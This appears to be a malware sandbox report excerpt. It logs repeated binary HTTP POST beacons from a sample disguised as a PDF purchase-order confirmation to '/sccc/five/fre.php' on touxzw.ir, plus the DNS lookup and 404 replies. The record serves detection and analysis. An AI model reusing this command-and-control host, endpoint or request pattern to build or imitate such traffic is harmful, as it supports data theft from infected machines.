            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 180Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 5_2_00404ED4 recv,5_2_00404ED4
            Source: global trafficDNS traffic detected: DNS query: touxzw.ir
            Source: unknownHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 180Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4K9BxjQto5BHxMrZI8q8jCMMMZY3kkEYVGaFJEkz5KIb0sTq7nyD%2ByWTg3HMHaaVRT9DyaTQAWPj97fxz8ImdabIgxpTrWa8Q%2FrXVL1g3hryhMare8TYSxHhjo8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ea39cc76e55d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2726&min_rtt=2726&rtt_var=1363&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=418&delivery_rate=0&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kYBb2I1%2FR5g2tFS%2F260BsU%2FiFfamxFj4OyAgLVOq1ZR3cnbn239rGRlmUHBj4hT7iZOz2S0CMwIbwmbu4iK1nIYaDrOgF8New4iTqSlO1iEQ4lj6ADsbrzK3KjY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ea403dddefa3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1986&rtt_var=993&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07lTHbqqklS0Y1RWwTbtFXzUk1Z1TlS%2BJXxBywovWgPUhiyuX49TU3fEy5KVUtZ0NeHKQg3niSlaU%2B%2BJgZp%2FFVNiP2d1fr5Eu%2FaL5ri9w%2ByzwHVASMqT9IxuZsI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ea4d28d118bc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7d6CzuzQ0oRnIZMF2Vihpw15PbU2MTXvgUYenv1kARjaj06xhcq1h1Q0QK5Q0YrRllViWD531a5Wy9mRr3XmdOtrffdQqF64jH4xY8GDgHIuY0iD1IBMjs1z3x4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ea671e3e8c30-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1920&rtt_var=960&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ThYuG1plXzNTDf2znpuD4IzedE%2BpSncrULgIGR3lHWKNWArdQDkA7Tdjpr3aV2ktp2PU77si%2B2X3KK2aQb5%2BfWPMpZjaEIIB%2B1PNJkf76Qlj8YhKJIfdhUKYxH0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201eaa57d244407-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2087&min_rtt=2087&rtt_var=1043&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iewWJgGWH3A0lga%2FHy0sUG%2Fg309utCcZuYvN%2BvQOmf3Cu7%2BkU6nJTchO94FPP57bj1Xlsv%2Fs9lgLxQ5o9iGU9pWo5R8JPGou%2BRcT6bNkSU%2BHgAvvhaa6ABA4G9s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201eabe29de421b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1640&rtt_var=820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tXSLX%2FQdqao4ZlPmlT0wGWDut1IHWc298Xdsrvd2lSUX4u22vy1dulfa%2FjC7f1T1Q%2FnoDINdiEEzBWHQL%2FlSzsD3HvS2kjCuHXYV1QK2lVdE9FYxv%2B0XlYSaBm4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201eae2be9d4fb3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1625&rtt_var=812&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=62&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Va6H%2FC1ZM7Rxd0tPkBRasUamji%2Fkz%2FGpZtWWvlRMfSYH9uuxEt30K3CJS7wGOiUNb7JL9TWvPtN23ZE5VAxsMt7MI3OwFICLWxdDrv5sXLhGFSvNd0qlIKJHCqQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201eaf09ba53308-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=2015&rtt_var=1007&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=128&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSPKB5bZBn4yV1oyX3sisk78ZC20SL7TmffpvgFVLYPKnxWNHKHyyEEI60Mz%2FgqbulhS9xCXS%2BqhWG%2FKz%2Bt%2F4rMDwyBmLweszRBoFHYtwcCUwjU4qV9o%2BkteFQY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201eafd88fadc28-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2402&min_rtt=2402&rtt_var=1201&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A9aRb3YkoLFMyhFzz866Rh0NYij3pf%2BXbMjcfTLGtUAQluEZ1w38H4f4qzvtiJfCdXZGCMFnUtgNCvcTdDvPsPONuly4jiHd2DbBrJGf8IiOb85iljMDAAjicDw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201eb2298f98cdc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1914&min_rtt=1914&rtt_var=957&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2FU2WMDxiPNL3gi5EGBjoI2GrBW5XN1HQE%2B5IMuONGEBsZIwbVrPpAX5uDwGQEZfSJV6%2F%2F4D0hyDFjatI2aKYlwK5147lSp3Afpm%2Bab58KgmaMZhhgBZ8qeNQNs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201eb2fac30efa3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1969&rtt_var=984&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
